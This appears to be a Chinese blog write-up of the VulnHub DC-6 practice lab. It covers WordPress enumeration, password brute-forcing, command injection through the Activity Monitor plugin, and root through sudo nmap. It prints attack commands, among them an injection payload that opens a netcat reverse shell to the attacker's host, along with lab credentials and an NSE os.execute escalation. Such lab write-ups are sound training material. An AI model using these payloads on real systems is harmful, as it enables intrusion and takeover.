当前位置: 首页 > article >正文

DC-6笔记

靶机信息

今天开DC-6

官方地址:DC: 6 ~ VulnHub

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

DC-6是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。

这不是一个非常困难的挑战,所以对初学者来说应该很好。

这个挑战的最终目标是扎根并读取唯一的标志。

必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。

对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上向我寻求帮助,让你继续学习。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。

只有一个flag,开干!

信息收集

nmap 192.168.66 2-254

请添加图片描述

确认IP为192.168.66.143

进一步的勘察

nmap 192.168.66.143 -A -p-

请添加图片描述

可以看见开放了两端口22和80

http(80)

我们先来看看web服务

额,直接访问有点问题哈,跳转了域名访问

我们需要写hosts文件来绑定域名(同理,kali里也需要修改hosts文件,在/etc目录下)

192.168.66.143 wordy

好了,可以直接用域名访问了

http://wordy/

一进去直接告诉我们用的是WordPress 框架
请添加图片描述

用插件能探测到具体的版本

先用wpscan扫一下,但是没扫出什么东西,扫了5个用户名

wpscan --url http://wordy/ -e u

请添加图片描述

然后路径扫描

请添加图片描述

在readme.html里得到登录页面wp-login.php

我前面忽略了一个作者给的重要的提示,在官网的下面一点

CLUE
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

我们依照提示生成字典

请添加图片描述

报错了,cd进目录看看
请添加图片描述

原来还没解压出来

gzip -d rockyou.txt.gz

请添加图片描述

解压完成后生成字典和之前获取到的用户名一起爆破得到一个账号密码
请添加图片描述

mark:helpdesk01

ssh登录不上,登录网站后台看看吧

进后台就看见了Activity Monitor插件,它是存在命令执行漏洞的

WordPress Activity Monitor插件远程命令执行漏洞_activity monitor 远程命令执行-CSDN博客

尝试一下还真行
请添加图片描述

这里输入框只能输入很少的几个字符,我们可以抓包,然后burp里修改

本来想echo写入一句话木马的,可是没成功,应该是权限的问题

然后就尝试nc反弹shell

现在本机接收,然后目标主机命令执行

ncat -lvp 2240

请添加图片描述

127.0.0.1 |nc -e /bin/bash 192.168.66.1 2240

请添加图片描述

可以发现shell反弹成功了哈

请添加图片描述

提权

用python改善shell的环境

python -c 'import pty;pty.spawn("/bin/bash")'
find / -user root -perm -4000 -print 2>/dev/null

没发现什么有利用价值的

还是去翻翻home目录

在mark的目录里发现了宝贝
请添加图片描述

graham:GSo7isUM1D4

疑似一个新的用户哈,直接切换过去试试
请添加图片描述

sudo -l

里面发现了提示
请添加图片描述

切换到jens的目录里看见观察backups.sh的权限

可以看见这个脚本的所有者和所属组是具有读写和执行权限的,我们再看看graham即当前登录用户的所属组
请添加图片描述

可以看见是在devs组里的,那么我们如果修改脚本并执行就可以得到jens用户的shell
请添加图片描述

以jens用户的身份执行backups.sh
请添加图片描述

使用sudo -l又发现提示用nmap提权

请添加图片描述

百度上学习了一番,当用户具有nmap的root的权限的时候,可以这样得到root权限

touch root_shell.sh
echo 'os.execute("/bin/sh")' > root_shell.sh
sudo nmap --script=root_shell.sh

请添加图片描述

flag

请添加图片描述

小结

第二次在DC系列里碰见WordPress了,而且两次都用到了暴力破解用户名密码

这次还学到了用nmap提权


http://www.kler.cn/a/442720.html

相关文章:

  • 深度学习中的学习率调度器(scheduler)分析并作图查看各方法差异
  • Golang 设计模式
  • 本地用docker装mysql
  • UML系列之Rational Rose笔记一:用例图
  • vue3+ts+element-plus 对话框el-dialog设置圆角
  • 认识机器学习中的经验风险最小化准则
  • Mysql学习笔记之SQL-2
  • 剑指Offer|LCR 007. 三数之和
  • sunset: midnight
  • Elasticsearch Kibana (windows版本) 安装和启动
  • vue3-tp8-Element:对话框实现
  • TCP Analysis Flags 之 TCP Fast Retransmission
  • 【Unity功能集】TextureShop纹理工坊(二)图层(下)
  • 车辆重识别代码笔记12.18
  • JS的原型和原型链浅析
  • 深度学习中,卷积层的若干思考!!!
  • 【OSS】php使用oss存储
  • 【Elasticsearch】使用阿里云 infererence API 及 semantic text 进行向量搜索
  • 27.多态
  • DuckDB: 两种方法实现动态分组查询
  • 解决git push出现的报错:Permission denied (publickey)
  • 本地项目显示正常,打包部署后ElementUI重点饿图标全部显示异常为小方框
  • 天线覆盖方案简图
  • 云连POS-ERP管理系统ZksrService存在SQL注入漏洞
  • bug之浮点数精度求和计算
  • IntelliJ IDEA中的语言级别版本与目标字节码版本配置